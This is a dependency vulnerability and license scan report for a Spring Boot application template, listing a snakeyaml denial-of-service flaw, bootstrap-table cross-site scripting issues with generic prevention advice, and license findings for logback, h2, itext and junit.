  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.0.0.

Overview

org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.

Affected versions of this package are vulnerable to Stack-based Buffer Overflow when parsing crafted untrusted YAML files, which can lead to a denial-of-service.

Remediation

Upgrade org.yaml:snakeyaml to version 1.31 or higher.

References

medium severity

Cross-site Scripting (XSS)

  • Vulnerable module: org.webjars.bower:bootstrap-table
  • Introduced through: org.webjars.bower:bootstrap-table@1.17.1

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.webjars.bower:bootstrap-table@1.17.1

Overview

org.webjars.bower:bootstrap-table is an extended table to integration with some of the most widely used CSS frameworks. (Supports Bootstrap, Semantic UI, Bulma, Material Design, Foundation, Vue.js).

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) due to improper sanitization of the onCellHtmlData callback method, it is possible to be exploited when exportOptions is set to "true".

Details

Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.

This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be manipulated:

Type Origin Description
Stored Server The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected Server The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based Client The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

  • Web servers
  • Application servers
  • Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

  • Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
  • Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
  • Give users the option to disable client-side scripts.
  • Redirect invalid requests.
  • Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
  • Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
  • Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

A fix was pushed into the master branch but not yet published.

References

medium severity

Cross-site Scripting (XSS)

  • Vulnerable module: org.webjars.bower:bootstrap-table
  • Introduced through: org.webjars.bower:bootstrap-table@1.17.1

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.webjars.bower:bootstrap-table@1.17.1

Overview

org.webjars.bower:bootstrap-table is an extended table to integration with some of the most widely used CSS frameworks. (Supports Bootstrap, Semantic UI, Bulma, Material Design, Foundation, Vue.js).

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) in the onCellHtmlData function. If you set the exportOptions in the Bootstrap Table to true, it will allow arbitrary Javascript to execute.

Details

A cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.

This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be manipulated:

Type Origin Description
Stored Server The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected Server The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based Client The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

  • Web servers
  • Application servers
  • Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

  • Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
  • Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
  • Give users the option to disable client-side scripts.
  • Redirect invalid requests.
  • Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
  • Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
  • Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

A fix was pushed into the master branch but not yet published.

References

medium severity

Dual license: EPL-1.0, LGPL-2.1

  • Module: ch.qos.logback:logback-classic
  • Introduced through: org.springframework.boot:spring-boot-starter-actuator@2.7.3, org.springframework.boot:spring-boot-starter-cache@2.7.3 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11

Dual license: EPL-1.0, LGPL-2.1

medium severity

Dual license: EPL-1.0, LGPL-2.1

  • Module: ch.qos.logback:logback-core
  • Introduced through: org.springframework.boot:spring-boot-starter-actuator@2.7.3, org.springframework.boot:spring-boot-starter-cache@2.7.3 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11

Dual license: EPL-1.0, LGPL-2.1

medium severity

Dual license: EPL-1.0, MPL-2.0

  • Module: com.h2database:h2
  • Introduced through: com.h2database:h2@2.1.214

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b com.h2database:h2@2.1.214

Dual license: EPL-1.0, MPL-2.0

medium severity

MPL-2.0 license

  • Module: com.lowagie:itext
  • Introduced through: net.sf.jasperreports:jasperreports@6.19.1

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b net.sf.jasperreports:jasperreports@6.19.1 com.lowagie:itext@2.1.7.js9

MPL-2.0 license

medium severity

EPL-1.0 license

  • Module: junit:junit
  • Introduced through: org.springframework.boot:spring-boot-starter-actuator@2.7.3, org.springframework.boot:spring-boot-starter-cache@2.7.3 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 org.apache.logging.log4j:log4j-to-slf4j@2.17.2 org.junit.vintage:junit-vintage-engine@5.8.2 junit:junit@4.13.2
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 org.apache.logging.log4j:log4j-to-slf4j@2.17.2 org.junit.vintage:junit-vintage-engine@5.8.2 junit:junit@4.13.2
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 org.apache.logging.log4j:log4j-to-slf4j@2.17.2 org.junit.vintage:junit-vintage-engine@5.8.2 junit:junit@4.13.2
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 org.apache.logging.log4j:log4j-to-slf4j@2.17.2 org.junit.vintage:junit-vintage-engine@5.8.2 junit:junit@4.13.2
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 org.apache.logging.log4j:log4j-to-slf4j@2.17.2 org.junit.vintage:junit-vintage-engine@5.8.2 junit:junit@4.13.2
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 org.apache.logging.log4j:log4j-to-slf4j@2.17.2 org.junit.vintage:junit-vintage-engine@5.8.2 junit:junit@4.13.2
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 org.apache.logging.log4j:log4j-to-slf4j@2.17.2 org.apache.logging.log4j:log4j-api@2.17.2 org.junit.jupiter:junit-jupiter-migrationsupport@5.8.2 junit:junit@4.13.2
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 org.apache.logging.log4j:log4j-to-slf4j@2.17.2 org.apache.logging.log4j:log4j-api@2.17.2 org.junit.jupiter:junit-jupiter-migrationsupport@5.8.2 junit:junit@4.13.2
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 org.apache.logging.log4j:log4j-to-slf4j@2.17.2 org.apache.logging.log4j:log4j-api@2.17.2 org.junit.jupiter:junit-jupiter-migrationsupport@5.8.2 junit:junit@4.13.2
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 org.apache.logging.log4j:log4j-to-slf4j@2.17.2 org.apache.logging.log4j:log4j-api@2.17.2 org.junit.jupiter:junit-jupiter-migrationsupport@5.8.2 junit:junit@4.13.2
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 org.apache.logging.log4j:log4j-to-slf4j@2.17.2 org.apache.logging.log4j:log4j-api@2.17.2 org.junit.jupiter:junit-jupiter-migrationsupport@5.8.2 junit:junit@4.13.2
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 org.apache.logging.log4j:log4j-to-slf4j@2.17.2 org.apache.logging.log4j:log4j-api@2.17.2 org.junit.jupiter:junit-jupiter-migrationsupport@5.8.2 junit:junit@4.13.2
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 org.apache.logging.log4j:log4j-to-slf4j@2.17.2 org.apache.logging.log4j:log4j-api@2.17.2 org.junit.vintage:junit-vintage-engine@5.8.2 junit:junit@4.13.2
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 org.apache.logging.log4j:log4j-to-slf4j@2.17.2 org.apache.logging.log4j:log4j-api@2.17.2 org.junit.vintage:junit-vintage-engine@5.8.2 junit:junit@4.13.2
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 org.apache.logging.log4j:log4j-to-slf4j@2.17.2 org.apache.logging.log4j:log4j-api@2.17.2 org.junit.vintage:junit-vintage-engine@5.8.2 junit:junit@4.13.2
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 org.apache.logging.log4j:log4j-to-slf4j@2.17.2 org.apache.logging.log4j:log4j-api@2.17.2 org.junit.vintage:junit-vintage-engine@5.8.2 junit:junit@4.13.2
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 org.apache.logging.log4j:log4j-to-slf4j@2.17.2 org.apache.logging.log4j:log4j-api@2.17.2 org.junit.vintage:junit-vintage-engine@5.8.2 junit:junit@4.13.2
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 org.apache.logging.log4j:log4j-to-slf4j@2.17.2 org.apache.logging.log4j:log4j-api@2.17.2 org.junit.vintage:junit-vintage-engine@5.8.2 junit:junit@4.13.2
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 org.apache.logging.log4j:log4j-to-slf4j@2.17.2 org.junit.vintage:junit-vintage-engine@5.8.2 junit:junit@4.13.2
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 org.apache.logging.log4j:log4j-to-slf4j@2.17.2 org.junit.vintage:junit-vintage-engine@5.8.2 junit:junit@4.13.2
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 org.apache.logging.log4j:log4j-to-slf4j@2.17.2 org.junit.vintage:junit-vintage-engine@5.8.2 junit:junit@4.13.2
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 org.apache.logging.log4j:log4j-to-slf4j@2.17.2 org.apache.logging.log4j:log4j-api@2.17.2 org.junit.jupiter:junit-jupiter-migrationsupport@5.8.2 junit:junit@4.13.2
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 org.apache.logging.log4j:log4j-to-slf4j@2.17.2 org.apache.logging.log4j:log4j-api@2.17.2 org.junit.jupiter:junit-jupiter-migrationsupport@5.8.2 junit:junit@4.13.2
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 org.apache.logging.log4j:log4j-to-slf4j@2.17.2 org.apache.logging.log4j:log4j-api@2.17.2 org.junit.jupiter:junit-jupiter-migrationsupport@5.8.2 junit:junit@4.13.2
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 org.apache.logging.log4j:log4j-to-slf4j@2.17.2 org.apache.logging.log4j:log4j-api@2.17.2 org.junit.vintage:junit-vintage-engine@5.8.2 junit:junit@4.13.2
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 org.apache.logging.log4j:log4j-to-slf4j@2.17.2 org.apache.logging.log4j:log4j-api@2.17.2 org.junit.vintage:junit-vintage-engine@5.8.2 junit:junit@4.13.2
